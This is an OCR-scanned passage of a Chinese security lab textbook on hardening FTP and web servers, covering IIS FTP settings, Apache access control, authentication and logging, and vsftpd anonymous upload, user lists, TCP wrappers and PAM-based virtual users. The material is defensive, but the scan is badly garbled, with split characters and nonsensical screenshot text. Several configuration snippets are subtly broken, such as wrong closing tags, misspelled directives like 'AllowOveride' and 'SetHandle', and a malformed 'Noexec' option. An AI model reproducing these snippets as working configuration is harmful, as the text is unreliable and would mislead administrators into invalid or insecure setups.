区 Mulimedia class Scheduler 


(6) 连接 数 限制 : 如 果 站 点 仅 为 很 少 的 客户 或 员工 提供 FTP 服务 ， 就 没有 必要 启用 
无 限制 连接 ， 因 为 它 会 让 拒绝 服务 攻击 变 得 容易 。 双 击 右 侧 栏目 的 【高 级 设置 】 出 现 
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FTP 高 级 设置 界面 ， 在 【最 大 连接 数 】 文 本 框 内 输入 适合 此 服务 器 的 限制 连接 数 ， 如 
图 11-50 所 示 。 在 站 点 上 设置 好 连接 数量 限制 后 ， 当 达到 最 大 连接 数量 时 ， 系 统 会 提醒 
用 户 系统 忙 的 消息 。 在 【控制 通道 超时 】 文 本 框 内 输入 断 开 没有 活动 用 户 的 时 间 值 ， 可 
以 避免 无 用 连接 长 期 占有 连接 数 。 


(7) FTP 行为 日 志 : 为 了 进行 系统 分 析 ， 需 要 记录 FTP 行为 日 志 。 为 了 记录 用 户 的 
活动 ， 在 每 个 FTP 站 点 的 主 目录 标签 中 都 要 启用 日 志 访 问 选项 。FTP 服务 日 志 选 项 和 设 
置 方法 同 Web 服务 类 似 ， 如 图 11-51 所 示 。 


| WORKSTATION (WORKS 
局 应 用 程序 池 


全 Defauk Web Site 
?mfp 
"全 Websitel 


Clinetpub\logs\LogFiles 
妨 码 (6): 


日 志文 件 滚动 更 新 
选择 FTP 用 于 创建 新 日 志文 件 的 方法 . 
人 
功能 视图 | 项 内 究 视 图 


图 11-51 日 志 设置 
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(8) 账号 安全 : 为 了 对 FTP 服务 器 进行 访问 ， 用 户 必 须 先 登录 。 双 击 【FTP 身份 验 
证 】 出 现 身 份 验证 管理 界面 , 如 图 11-52 所 示 , 在 该 界面 上 可 以 控制 哪些 人 可 以 访问 FTP 
服务 器 ， 以 及 谁 可 以 管理 它 。 如 果 FTP 站 点 提供 一 般 的 Internet 访问 ， 则 启用 【匿名 身 
份 验证 】 然后 选 定 一 个 匿名 用 户 访问 的 账号 。 如 果 禁 用 【匿名 身份 验证 】 那么 每 个 用 
户 访问 FTP 站 点 都 必须 输入 用 户 名 和 口令 .如果 要 使 用 非 匿名 的 连接 , 必须 使 用 Windows 
安全 策略 来 强制 用 户 使 用 可 靠 的 口令 。 如 图 11-53 所 示 为 FTP 登录 对 话 框 。 


| 图 ，woRKSTATION ， 网 站 myftp ， 
| 文件 日。 视图 WwW 帮助 恒 
| i 
血 | @ FTP 身份 验证 昔 用 
4 . 园 WORKSTATION 分 组 依据 :不 进行 分 组 丰 编 强 … 
局 应 用 程序 池 Pm || x ee 
4 国 网 站 3 证 
自 得 序 … 
， 多 Defauk we| | (ESNORE ER 用 | 
他 于 身份 验 下 已 启用 © nm 
»@ Websitel Dh 
le) 0 
1 7| 园 图 | 怖 内 容 视图 
配置 : “applicationHost.config” 己 


11-52 ”安全 账号 管理 


登录 后 ， 可 以 将 这 个 服务 器 添加 到 您 的 收藏 夫 ， 以 便 轻 易 返 回 。 


回 匿名 登录 


图 11-53 ”FTP 登录 对 话 框 


【实验 报告 】 

(1) FTP 服务 器 安全 配置 过 程 。 

(2) 完成 练习 ， 使 用 安全 扫描 工具 对 配置 前 后 的 FTP 服务 器 进行 扫描 ， 并 比 对 扫描 
结果 。 

【思考 题 】 

(1) 搜集 FTP 站 点 常见 漏洞 ， 并 和 本 机 的 FTP 站 点 进行 比较 。 


(2) 分 别 使 用 【只 允许 匿名 连接 】 和 【允许 IS 控制 密码 】 策 略 设置 FTP 站 点 ， 并 
进行 实际 连接 ， 体 会 它们 的 不 同 。 
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(3) 在 FTP 站 点 上 新 建 两 个 虚拟 目录 ， 分 别 设置 为 只 读 和 只 写 ， 并 进行 实际 连接 
测试 。 


_ 2 Linux 中 Web、FTP 服务 器 的 安全 配置 


11.2.1 ”Web 服务 器 的 安全 配置 


【实验 目的 】 

掌握 Apache 服务 器 的 运行 环境 的 安全 配置 方法 ， 掌 握 Apache 服务 器 的 用 户 验 证 机 
制 和 配置 方法 ， 了 解 认 证 规则 的 制定 原则 ， 掌握 Apache 日 志 管 理 的 技术 ， 了 解 一 般 日 志 
处 理 方法 。 

【原理 简介 】 

Apache 是 开放 源 代码 的 Web 服务 器 软件 ， 是 Linux 上 最 常用 的 Web 服务 器 ， 同 其 
他 应 用 程序 一 样 ，Apache 也 存在 安全 缺陷 。Apache 服务 器 的 安全 缺陷 主要 是 使 用 HTTP 
进行 的 拒绝 服务 攻击 (Denial of Service，DoS)、 缓 冲 区 溢出 攻击 以 及 被 攻击 者 获得 root 
权限 缺陷 。 正 确 维护 和 配置 能 够 保护 Apache 服务 器 免 遭 多 种 攻击 。 

Apache Web 服务 器 主要 有 三 个 配置 文件 , 位 于 /usr/local/apache/conf 目录 下 。 这 三 个 
文件 是 : httpd.conf 是 服务 器 的 主 配置 文件 ，srm.conf 是 Web 资源 文件 ，access.conf 是 文 
件 的 访问 权限 文件 。Apache 的 默认 配置 为 用 户 提供 了 一 个 良好 的 模板 ， 基 本 的 配置 几乎 
不 用 修改 ， 服 务 器 就 可 以 很 好 地 运行 。 但 是 默认 的 配置 没有 提供 安全 需求 ， 下 面 的 实验 
将 讲述 如 何 进行 安全 的 配置 。 

Apache 使 用 三 个 指令 配置 访问 控制 : Order 用 于 指定 执行 允许 访问 规则 和 执行 拒绝 
访问 规则 的 先后 顺序 ，Deny 定义 拒绝 访问 列表 ，Allow 定义 允许 访问 列表 。Order 指令 
有 以 下 两 种 形式 。 

e OrderAllow，Deny: 在 执行 拒绝 访问 规则 之 前 先 执行 允许 访问 规则 ， 默认 情况 下 

将 会 拒绝 所 有 没有 明确 被 允许 的 客户 。 

e Order Deny，Allow: 在 执行 允许 访问 规则 之 前 先 执行 拒绝 访问 规则 ， 默 认 情况 
下 将 会 允许 所 有 没有 明确 被 拒绝 的 客户 。 

Deny 和 Allow 指令 的 后 面 是 访问 列表 ， 访 问 列表 可 以 使 用 如 下 几 种 形式 。 
All: 表示 所 有 客户 。 

域名 : 表示 域内 所 有 客户 。 

IP 地 址 : 可 以 指定 完整 的 IP 地 址 或 部 分 PP 地 址 。 

网 络 / 子 网 掩 码 : 如 192.168.1.0/255.255.255.0。 

CIDR 规范 : 如 192.168.1.0/24。 

Apache 有 两 种 认证 类 型 : 基本 认证 (Basic) 和 摘要 认证 (Digest)， 摘 要 认证 比 基 
本 认证 更 加 安全 ， 但 是 并 非 所 有 的 浏览 器 都 支持 摘要 认证 ， 所 以 大 多 数 情况 下 使 用 基本 
认证 。Apache 通过 认证 配置 指令 配置 认证 方式 ， 认 证 配置 指令 如 下 。 
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AuthName: 定义 受 保护 领域 的 名 称 。 
AuthType: 定义 使 用 的 认证 方式 ，Basic 或 Digest。 
AuthGroupFile: 指定 认证 组 文件 的 位 置 。 
AutheUserFile: 指定 认证 口令 文件 的 位 置 。 

当 使 用 了 认证 指令 配置 了 认证 之 后 ， 还 需要 为 指定 的 用 户 或 组 进行 授权 。 为 用 户 或 
组 进行 授权 的 指令 是 Require。Require 指令 有 以 下 三 种 格式 。 

e@ Require user 用 户 名 [用 户 名 ]: 授权 给 一 个 或 多 个 用 户 。 

e@ Require group 组 名 [组 名 ]: 授权 给 指定 的 一 个 或 多 个 组 。 

。 Require valid-user: 授权 给 认证 口令 文件 中 的 所 有 用 户 。 

Apache 支持 两 种 格式 的 认证 文件 ， 一 种 是 文本 格式 的 认证 口令 文件 和 认证 组 文件 ， 
一 种 是 基于 数据 库 的 认证 口令 文件 和 认证 组 文件 。 本 实验 主要 以 文本 文件 为 主 。 可 以 使 
用 指令 : htpasswd -c 认证 口令 文件 名 用 户 名 , 创建 一 个 认证 口令 文件 ， 同 时 添加 一 个 用 
户 ， 使 用 指令 : htpasswd 认证 口令 文件 名 用 户 名 ， 向 现存 的 口令 文件 中 添加 用 户 或 修改 
已 存在 用 户 的 口令 。 为 了 安全 , 认证 口令 文件 一 般 不 要 和 Web 文档 存在 域 相同 的 目录 下 。 
htpasswd 没有 提供 删除 用 户 的 选项 ， 删 除 用 户 ， 可 以 直接 使 用 文本 编辑 器 对 认证 口令 文 
件 进 行 编辑 ， 删 除 指定 用 户 的 行 即 可 。 

【实验 环境 】 

Linux 服务 器 系统 ，Apache Server 软件 。 


【实验 步骤 】 

1. 安全 运行 环境 设置 

(1) 系统 以 Nobody 用 户 运行 。 一 般 情况 下 ，Apache 是 由 Root 来 安装 和 运行 的 。 
如 果 Apache Server 进程 具有 Root 用 户 特权 ， 那 么 它 将 给 系统 的 安全 构成 很 大 的 威胁 。 
通过 修改 httpd.conf 文件 中 的 下 列 选项 ， 以 Nobody 用 户 运 行 Apache 达到 相对 安全 的 
目的 。 


User nobody 

Group # -1 

(2) ServerRoot 目录 的 权限 设置 。 为 了 确保 所 有 的 配置 是 适当 的 和 安全 的 ， 需 要 严 
格 控制 Apache 主 目 录 的 访问 权限 ， 使 非 超级 用 户 不 能 修改 该 目录 中 的 内 容 。Apache 的 
主 目录 对 应 于 Apache Server 配置 文件 httpd.conf 的 Server Root 控制 项 中 ， 应 为 : 


Server Root /usr/local/apache 


(3) SSI 的 配置 。 在 配置 文件 access.conf 或 httpd.conf 中 的 Options 指令 处 加 入 
IncludesNOEXEC 选项 ， 用 以 禁用 Apache Server 中 的 执行 功能 。 避 免 用 户 直接 执行 
Apache 服务 器 中 的 执行 程序 ， 而 造成 服务 器 系统 的 公开 化 。 


<Directory /var/*/public html> 
Options Includes Noexec 
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</Directory> 


(4) 阻止 用 户 修改 系统 设置 。 在 Apache 服务 器 的 配置 文件 中 进行 以 下 的 设置 ， 阻 
止 用 户 建立 、 修 改 .htaccess 文件 ， 防 止 用 户 超越 能 定义 的 系统 安全 特性 。 在 配置 文件 
httpd.conf 中 加 入 如 下 内 容 : 


<Directory /> 
AllowOveride None 
Options None 
Allow from all 

</Directory> 


然后 再 分 别 对 特定 的 目录 进行 适当 的 配置 。 

(5) Apache 服务 器 的 默认 访问 特性 。 Apache 的 默认 设置 只 能 保障 一 定 程度 的 安全 ， 
如 果 服 务 器 能 够 通过 正常 的 映射 规则 找到 文件 ， 那 么 客户 端 便 会 获取 该 文件 ， 如 
http://local host/~ root/ 将 允许 用 户 访问 整个 文件 系统 。 在 配置 文件 httpd.conf 中 加 入 如 下 
内 容 将 禁止 对 文件 系统 的 默认 访问 。 


<Directory /> 
Order deny, allow 
Deny from all 
</Directory> 


(6) CGI 脚本 的 安全 考虑 。 对 系统 的 CGI 而 言 , 最 好 将 其 限制 在 一 个 特定 的 目录 下 ， 
如 cgi-bin 之 下 ， 便 于 管理 ; 另外 应 该 保证 CGI 目录 下 的 文件 是 不 可 写 的 ， 避 免 一 些 欺骗 
性 的 程序 驻 留 或 混迹 其 中 ; 除去 CGI 目录 下 的 所 有 非 业 务 应 用 的 脚本 ， 以 防 异 常 的 信息 

2. 用 户 认证 和 访问 控制 

(1) 在 /Var/www (apache 的 主页 根 目录 ) 下 建立 一 个 test 目录 , 然后 编辑 httpd.conf， 
添加 如 下 内 容 : 


Alias /test"/var/www/test" 

<Directory "/var/www/test"> 

Options Indexes MultiViews 

AllowOverride AuthConfig  # 表 示 进 行 身份 验证 ， 这 是 关键 的 设置 
Order allow,deny 

Allow from all 

<Directory> 


(2) 在 /var/wwwltest 中 创建 .htaccess 文件 ， 输 入 如 下 内 容 : 


AuthName "mysite" 
AuthType Basic 
AuthUserFile /var/www/passwd/.htpasswd 


require valid-user 
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#AuthName 描述 , 随便 写 
#AuthUserFile /var/www/passwd/.htpasswd 
#require valid-user 或 者 require user mysite 限制 是 所 有 合法 用 户 还 是 指定 用 户 


(3) 创建 Apache 的 验证 用 户 testuserl 和 testuser2。 


htpasswd -c /var/www/passwd/.htpasswd testuserl 
htpasswd /var/www/passwd/.htpasswd testuser2 


第 一 次 创建 用 户 要 用 到 -c 参数， 第 二 次 添加 用 户 ， 就 不 用 -c 参数 。 然 后 将 认证 口令 
文件 的 属 主 改 为 nobody。 

(4) 重启 Apache 服务 ， 然 后 访问 http://mysite/test。 如 果 顺 利 ， 应 该 能 看 到 一 个 用 户 
验证 的 弹出 窗口 ， 如 图 11-54 所 示 ， 只 要 填 入 第 (3) 步 创 建 的 用 户 名 和 密码 就 行 。 


请 为 "Mysite"@mysite 输 入 用 户 名 和 密码 
用 户 名 


口 使 用 密码 管理 器 来 记 住 这 些 值 


图 11-54 ”认证 和 授权 测试 


(5) 也 可 直接 在 httpd.conf 内 配置 认证 和 授权 ， 方 法 为 编辑 httpd.conf， 添 加 如 下 
内 容 : 


<Directory "/var/www/test"> 
AllowOverride None 
AuthName "mysite" 
AuthType Basic 
AuthUserFile /var/www/passwd/.htpasswd 
require valid-user 
Order allow,deny 
Allow from all 
<Directory> 


然后 创建 认证 口令 文件 和 添加 用 户 , 方法 同 (3)， 重 新 启动 Apache 服务 ， 同 样 可 以 
启动 对 用 户 进 行 认证 的 作用 。 
(6) 添加 访问 控制 列表 ， 编 辑 httpd.conf， 添 加 如 下 内 容 。 


<Location /server-status> 
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SetHandle server-status 
Order deny,allow 
// 配 置 访问 控制 
Deny from all 
Allow from 192.168.0 // 允 许 192 .168.0 网 段 内 主机 的 访问 
// 配 置 认证 授权 
AuthType Basic 
AuthName "Admin" 
AuthUserFile /var/www/passwd/.htpasswd 
AuthGroupFile /var/www/passwd/.htpasswdgrp 
require group admin 
Satisfy all 
//all 表示 访问 控制 和 认证 授权 两 类 指令 均 起 作用 any 表示 任 一 条 件 满足 即 可 


</Loacation> 


(7) 创建 认证 组 文件 ， 使 用 命令 vi /var/www/passwd/.htpasswdgrp， 添 加 如 下 内 容 : 
admin: testuserl testuser2。 保 存 退 出 然后 修改 文件 属 主 为 apache。 

(8) 重 新 启动 httpd 服务 : service httpd restart。 在 客户 端 浏览 器 检测 配置 , 在 192.168.0 
网 段 上 的 主机 的 访问 结果 ， 而 非 192.168.0 网 段 上 的 主机 和 没有 Admin 组 身份 的 人 都 不 
能 访问 。 

3. 日 志 管理 

Apache 日 志 主要 有 两 类 : 错误 日 志和 访问 日 志 ， 可 以 通过 日 志 配置 指令 进行 配置 ， 
主要 配置 指令 如 下 。 

(1) ErrorLog。 用 法 : ErrorLog 错误 日 志文 件 名 ， 指 定 错误 日 志 存 放 路 径 。 

(2) LogLevel。 用 法 : LogLevel 错误 日 志 记录 等 级 ， 指 定 错误 日 志 的 记录 等 级 。 

(3) LogFormat。 用 法 : LogFormat 记录 格式 说 明 串 ， 为 一 个 日 志 记录 格式 命名 。 

(4) CustomLog。 用 法 : CustomLog 访问 日 志文 件 名 ， 指 定 访问 日 志 存 放 路 径 和 记 
录 格 式 。 

错误 日 志 配置 : 配置 错误 日 志 相 对 简单 ， 只 要 说 明日 志文 件 的 存放 路 径 和 日 志 记录 
等 级 即 可 ， 默 认 的 日 志 配 置 为 : 

ErrorLog logs/error log 


LogLevel warn 


志 记 录 等 级 ， 主 要 情况 如 表 11-2 所 示 。 
表 11-2 错误 日 志 记 录 等 级 


紧急 程度 说 明 
1 出 现 紧急 情况 使 得 该 系统 不 可 用 
2 需要 立即 引起 注意 的 情况 
E 危险 情况 的 警告 
4 除了 emerg、alert、crit 的 其 他 错误 
5 警告 信息 
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6 | notice 需要 引起 注意 的 情况 
7 | in® 值得 报告 的 一 般 情况 


debug 由 运行 于 debug 模式 的 程序 产生 的 消息 


如 果 指定 了 等 级 warn， 那 么 记录 紧急 程度 1 一 5 的 所 有 错误 信息 。 

错误 日 志 记录 格式 ， 从 文件 内 容 可 以 看 出 错误 日 志 的 记录 格式 为 [日 期 和 时 间 ] [错误 
等 级 ] [错误 消息 ]。 

配置 访问 日 志 : 为 了 便于 分 析 Apache 的 访问 日 志 ，Apache 的 默认 配置 文件 中 ， 按 
记录 的 信息 不 同 ， 将 访问 日 志 分 为 4 类 ， 可 以 使 用 LogFormat 进行 定义 ， 具 体内 容 如 
表 11-3 所 示 。 


表 11-3 访问 日 志 的 格式 分 类 


格式 分 类 格式 昵称 说 明 
普通 日 志 格式 大 部 分 的 日 志 分 析 软件 都 支持 这 种 格式 


参考 日 志 格 式 记录 客户 访问 站 点 的 用 户 身份 
代理 日 志 格式 记录 请 求 的 用 户 代理 
综合 日 志 格 式 结合 以 上 三 种 日 志 信息 


由 于 综合 日 志 格式 简单 地 综合 了 三 种 日 志 信息 ， 所 以 配置 访问 日 志 时 ， 要 么 使 用 三 
个 文件 分 别 记录 ， 要 么 使 用 一 个 综合 文件 进行 记录 。Apache 默认 的 记录 格式 为 : 
® LogFormat "%h %l] %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" 
combined 


CustomLog logs/access log combined 

若 使 用 三 个 文件 分 别 进行 记录 ， 可 以 配置 为 : 
LogFormat "%h %] %u %t \"%r\" %>s %b" common 
LogFormat "% {Referer}i -> %U" referer 
LogFormat "% {User-agent}i" agent 

CustomLog logs/access log common 

CustomLog logs/referer log referer 


CustomLog logs/agent log agent 
LogFormat 的 常用 指令 说 明 如 表 11-4 所 示 。 
表 11-4 LogFormat 指令 常用 的 格式 说 明 符 


格式 说 明 说 明 
%h 客户 机 的 人 P 地址 
%l 从 identd 服务 器 中 获取 远程 登录 名 称 
%u 来 自 于 认证 的 远程 用 户 
%t 连接 的 日 期 和 时 间 
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续 表 
格式 说 明 说 明 
hr HTTP 请 求 的 首 行 信息 
%>s 响应 请 求 的 状态 代码 
%b 传送 的 字 节 数 
% {Referer}i 发 给 服务 器 的 请 求 头 信 息 
%{User-Agent}i 使 用 的 浏览 器 信息 


日 志 统 计 分 析 : Red Hat Linux 9 自 带 的 Webalizer 是 一 款 高 效 的 、 免 费 的 Web 服务 
器 日 志 分 析 程 序 ， 其 分 析 结 果 是 HTML 格式 ， 从 而 可 以 很 方便 地 通过 Web 服务 器 进行 
浏览 ， 其 默认 的 配置 即 可 工作 得 很 好 ， 无 须 进行 更 多 的 配置 。Webalizer 的 分 析 数 据 应 该 
只 能 由 管理 员 浏 览 ， 所 以 要 在 httpd.conf 内 进行 认证 和 授权 的 配置 ， 添 加 如 下 内 容 : 


<Directory "/var/www/html/usage"> 
AuthType Basic 
AuthName "Admin" 
AuthUserFile /var/www/passwd/.htpasswd 
AuthGroupFile /var/www/passwd/.htpasswdgrp 
require group admin 

<Directory> 


修改 配置 好 之 后 ， 重 新 启动 服务 器 ， 在 客户 端的 浏览 器 内 输入 : http://mysite/usage， 
经 过 身份 认证 之 后 可 以 看 到 如 图 11-55 所 示 的 界面 。 


文件 E) 编辑 EE) 查看 (V》 转 到 (G) 书签 (B) 工具 (D 窗口 (WwW) 帮助 (H) 
总 -训导 [twee 
| 帮 Red Hat Network 阵 Support 萝 Shop 前 pmduas 区 Trining 


Summary 
Generated 14-Dec-2005 09:17 CST 


图 11-55 ”使 用 Webalizer 工具 分 析 访 问 日 志 
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【实验 报告 】 
(1) 详细 叙述 Web 服务 器 的 配置 过 程 。 
(2) 请 结合 PAM 认证 机 制 对 Web 服务 器 进行 权限 分 配 。 


【思考 题 】 
查找 Apache 服务 器 的 常见 漏洞 ， 分 析 本 机 配置 的 安全 性 。 


11.2.2 FTP 服务 器 的 安全 配置 


【实验 目的 】 
掌握 vsftpd 服务 器 中 配置 基于 本 地 用 户 的 访问 控制 和 基于 主机 的 访问 控制 的 方法 ， 
掌握 配置 虚拟 用 户 的 方法 ， 了 解 使 用 虚拟 用 户 的 目的 。 


【原理 简介 】 

vsftpd 在 Red Hat Linux 9 下 的 配置 文件 主要 有 三 个 , 分 别 是 : /etc/vsftpd/vsftpd.conf， 
/etc/vsftpd.ftpusers ， /etc/vsftpd.user_list。 其 中 /etc/vsftpd/vsftpd.conf 是 主 配 置 文件 ， 
vsftpd.ftpusers 指定 了 哪些 用 户 不 能 访问 FTP 服务 器 ，vsftpd.user list 指定 的 用 户 是 在 
vsftpd.conf 中 设置 了 userlist enable=YES，userlist_deny=YES 时 不 能 访问 服务 器 ， 当 
userlist_ enable=YES ，userlist deny=NO 时 只 有 vsftpd.user list 指定 的 用 户 才能 访问 服 
务 器 。 

在 默认 的 情况 下 ，vsftpd 在 Red Hat Linux 9 的 访问 控制 功能 如 下 。 

(1) 允许 匿名 用 户 和 本 地 用 户 登 录 。 

(2) 匿名 用 户 的 登录 名 为 ftp 或 anonymous， 口 令 为 一 个 E-mail 地 址 。 

(3) 匿名 用 户 不 能 离开 匿名 服务 器 目录 /var/ftp， 且 只 能 下 载 不 能 上 传 。 

(4) 本 地 用 户 的 登录 名 为 本 地 用 户 名 ,口令 为 本 地 用 户口 令 。 

(5) 本 地 用 户 可 以 离开 自己 的 主 目录 切换 至 有 访问 权限 的 其 他 目录 ， 并 在 权限 允许 
的 情况 下 进行 上 传 和 下 载 。 

(6) 在 /etc/vsftpd.ftpusers 登录 的 用 户 禁 止 登录 。 

虚拟 用 户 只 能 访问 为 其 提供 的 FTP 服务 ， 虚拟 用 户 不 能 像 本 地 用 户 那 样 可 以 登录 系 
统 而 访问 系统 的 其 他 资源 , 本 地 用 户 登录 FTP 访问 , 容易 暴露 给 外 界 服务 器 的 用 户 情况 。 
因此 使 用 虚拟 用 户 能 够 提供 系统 的 安全 性 。 

传统 的 FTP 服务 器 采用 如 下 方法 实现 虚拟 用 户 : 在 本 地 建立 普通 用 户 账号 并 设置 密 
码 ， 将 其 登录 Shell 设 为 不 可 登录 ， 由 系统 口令 系统 对 用 户 进行 认证 。vsftpd 不 采用 这 种 
方式 “, ”通过 建立 独立 的 口令 库 ， 通 过 PAM 进行 认证 ， 更 加 安全 和 灵活 。 

【实验 环境 】 

Linux 服务 器 系统 ，vsftpd 软件 包 。 

【实验 步骤 】 

1. 允许 匿名 用 户 上 传 

Cy 编辑 /etc/vsftpd/vsftpd. conf， 将 #anon | upload enable=YES 和 #anon mkdir write_ 
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enable=YES 前 的 # 去 掉 。 同 时 write_enable=YES 有 效 ， 编 辑 完 成 后 退出 。 

(2) 创建 匿名 上 传 目 录 ， 在 /var/ftp/pub/ 内 创建 只 写 目 录 。 使 用 命令 : 

mkdir /var/ftp/pub/upload 
下 一 步 ， 改 变 权限 使 匿名 用 户 看 不 到 目录 中 的 内 容 ， 输 入 : 

chmod 730 /var/ftp/pub/upload 
长 格式 的 目录 列表 看 起 来 应 该 像 ; 

drwx-wx--— 2 root ftp 4096 Feb 13 20:05 upload 


(3) 重新 启动 FTP 服务 器 : service vsftpd restart。 使 用 客户 端 进行 测试 ， 测试 结果 如 
图 11-56 所 示 。 


[newuserl@mylinux newuserl]S ftp 192.168.0.10 
Connected to 192.168.0.10 (192.168.0.10). 

220 (vsFTPd 1.1.3) 

Name (192.168.0.10:root): fip 

331 Please specify the password. 

Password: 

230 Login successful. Have fun. 

Remote system type is UNIX. 

Using binary mode to transfer files. 

ftp> cd incoming 

250 Directory successfully changed. 

ftp> ls 

227 Entering Passive Mode (192, 168, 0, 10, 110, 215) 
150 Here comes the directory listing. 

226 Directory send OK. 

ftp> put test.txt 

local: test.txt remote: test.txt 

227 Entering Passive Mode (192, 168, 0, 10, 184, 225) 
150 Ok to send data. 

226 File receive OK. 

11 bytes sent in 0.000183 secs (59 Kbytes/sec) 

ftp> cd /pub 

250 Directory successfully changed. 

ftp> ls 

227 Entering Passive Mode (192, 168, 0, 10, 218, 31) 
150 Here comes the directory listing. 

-TWXI--T-- 1 14 50 29568 Dec 13 07:58 swatch-3.1.1.tar.gz 
226 Directory send OK. 

ftp> put test.txt 

local: test.txt remote: test.txt 

227 Entering Passive Mode (192, 168, 0, 10, 200,，193) 
553 Could not create file. 

ftp> bye 

221 Goodbye. 


图 11-56 ”匿名 上 传 结果 测试 
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2. 访问 控制 
限制 指定 的 本 地 用 户 不 能 访问 ， 而 其 他 本 地 用 户 可 访问 ， 编 辑 /etc/vsftpd/vsftpd.conf， 
添加 下 面 的 设置 : 


userlist enable=YES 
userlist deny=YES 
userlist file=/etc/vsftpd.user list 


在 文件 /etc/vsftpd.user_list 中 编辑 不 能 访问 FTP 的 用 户 。 

限制 指定 的 本 地 用 户 可 以 访问 ， 而 其 他 本 地 用 户 不 可 访问 ， 编 辑 /etc/vsftpd/vsftpd.conf， 
添加 下 面 的 设置 : 

userlist enable=YES 


userlist deny=NO 
userlist file=/etc/vsftpd.user list 


在 文件 /etc/vsftpd.user_list 中 编辑 能 访问 FTP 的 用 户 , 而 其 他 的 本 地 用 户 不 可 以 访问 
FTP 服务 器 。 

vsftp 通过 TCP_wrapper 实现 对 主机 的 访问 控制 , TCP_wrappe 使 用 /etc/hosts.allow 和 
/etc/hosts.deny 进行 方法 控制 ，/etc/hosts.allow 是 允许 表 ，/etc/hosts.deny 是 拒绝 表 ， 但 
/etc/hosts.allow 也 允许 使 用 DENY 表示 拒绝 , 因此 也 可 以 只 使 用 /etc/hosts.allow 进行 配置 。 
配置 的 语法 形式 如 下 。 

vsftpd: 主机 列表 : setenv VSFTPD_LOAD_CONF 配置 文件 名 

vsftpd 表示 对 vsftpd 实施 访问 控制 , setenv VSFTPD_LOAD_CONF 配置 文件 名 一 表示 
当 遇 到 主机 表 中 的 主机 访问 本 FTP 服务 器 时 ， 使 用 配置 文件 对 主机 进行 访问 控制 。 

下 面 的 实验 实现 如 下 功能 。 

(1) 拒绝 192.168.2.0/24 访问 。 

(2) 允许 192.168.1.0/24 内 的 主机 进行 最 大 传输 速度 传输 。 

(3) 对 其 他 主机 的 访问 限制 每 IP 的 连接 数 为 1， 最 大 传输 速率 为 10KB/s。 

首先 编辑 /etc/vsftpd/vsftpd.conf， 添 加 如 下 内 容 : 


tcp_wrappers=YES 
local max_ rate=10000 
anon max_ rate=10000 
max_per_ip=1 


然后 编辑 /etc/hosts.allow 文件 ， 添 加 如 下 内 容 : 


vsftpd: 192.168.1.0/24: setenv VSFTPD LOAD CONF /etc/vsftpd/vsftpd_ 
tcp_wrap.conf 
vsftpd: 192.168.2.0/24: DENY 


再 编辑 /etc/vsftpd/vsftpd_tcp_wrap.conf， 添 加 如 下 内 容 : 


local max rate=0 
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anon max rate=0 
max_ per_ip=0 
然后 重新 启动 服务 程序 。 
3. 配置 虚拟 用 户 的 FTP 服务 器 
(1) 生成 虚拟 口令 库 文 件 。 首 先生 成 一 个 文本 文件 ftppass.txt。 内 容 如 下 : 


virtural userl 
qweier82 
virtural user2 
i82349s 


文本 格式 为 奇数 行为 用 户 名 ， 偶 数 行为 该 用 户 的 口令 ， 即 userl 的 口令 为 qweier82。 
然后 使 用 命令 db_ load 生产 口令 库 文 件 : 


db_load -T -t hash -f ftppass.txt /etc/vsftpd/vsftpd login.db 
chmod 600 /etc/vsftpd/vsftpd login.db 


(2) 生产 vsftpd 的 认证 文件 。 编 辑 /etc/pam.d/vsftp.vu， 添 加 如 下 内 容 。 


auth required /lib/security/pam userdb.so db=/etc/vsftpd/vsftpd login 
account required /lib/security/pam userdb.so db=/etc/vsftpd/vsftpd_ 
login 


(3) 建立 虚拟 用 户 要 访问 的 目录 ， 并 设置 权限 。 


useradd -d /home/ftpsite/ virtual 
chmod 700 /home/ftpsite/ 


(4) 修改 vsftpd 主 配置 文件 /etc/vsftpd/vsftpd.conf， 添 加 如 下 内 容 : 


listen=YES 
anonymous_enable=NO 

local enable=YES 

write enable= NO 

anon_ upload enable= NO 

anon mkdir write enable= NO 
anon other write enable= NO 
chroot_ local user=YES 

ftpd banner=This FTP Server is virtual user only 
guest_ enable=YES 

guest username=virtual 


Pam service name=vsftp.vu 


(5) 虚拟 用 户 的 权限 分 配 。 在 vsftpd 主 配置 文件 /etc/vsftpd/vsftpd.conf 中 添加 如 下 
内 容 : 


user config dir=/etc/vsftpd user conf 
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创建 虚拟 用 户 的 配置 文件 存放 路 径 : 


mkdir /etc/vsftpd user conf 


在 目录 下 为 每 个 用 户 建 立 配 置 文件 ， 文件 名 同 用 户 名 。 
virtural_userl 用 户 具 有 浏览 目录 和 下 载 权限 ， 其 配置 文件 内 容 为 : 


anon world readable only=NO 
virtural_user2 用 户 具有 浏览 目录 、 上 传 、 下 载 、 文 件 改 名 和 删除 的 权限 : 


anon_world readable only=NO 
write enable=YES 

anon upload enable=YES 
anon_other write enable=YES 


(6) 重启 vsftpd， 并 测试 。 实 验 结果 如 下 : 账户 virtural_userl 测试 结果 如 图 11-57 
所 示 ， 只 能 下 载 不 能 上 传 。 


[newuserl@mylinux newuserl]$ ftp 192.168.0.10 
Connected to 192.168.0.10 (192.168.0.10). 

220 This ftp server is virtual user only. 

Name (192.168.0.10:root): virtural_userl 

331 Please specify the password. 

Password: 


230 Login successful. Have fun. 

Remote system type is UNIX. 

Using binary mode to transfer files. 

ftp> ls 

227 Entering Passive Mode (192，168，0，10，154，207) 

150 Here comes the directory listing. 

-TW-T--T-- 1 503 503 15 Dec 14 10:40 ftp.txt 
226 Directory send OK. 

ftp> put test.txt 

local: test.txt remote: test.txt 

227 Entering Passive Mode (192, 168, 0, 10, 194, 157) 

550 Permission denied. 

ftp> get ftp.txt 

local: ftp.txt remote: ftp.txt 

227 Entering Passive Mode (192, 168, 0, 10, 129, 82) 

150 Opening BINARY mode data connection for ftp.txt (15 bytes). 
226 File send OK. 

15 bytes received in 6.1e-05 secs (2.4e+02 Kbytes/sec) 

ftp> bye 

221 Goodbye. 


图 11-57 ”virtural_userl 测试 结果 
账户 virtural_user2 测试 结果 如 图 11-58 所 示 ， 既 能 上 传 也 能 下 载 。 


【实验 报告 】 
(1) 详细 叙述 FTP 服务 器 配置 过 程 。 
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[newuserl@mylinux newuserl]$ ftp 192.168.0.10 
Connected to 192.168.0.10 (192.168.0.10). 

220 This ftp server is virtual user only. 

Name (192.168.0.10:root): virtural_user2 

331 Please specify the password. 

Password: 

230 Login successful. Have fun. 

Remote system type is UNIX. 

Using binary mode to transfer files. 

ftp> ls 

227 Entering Passive Mode (192, 168, 0, 10, 93, 121) 
150 Here comes the directory listing. 

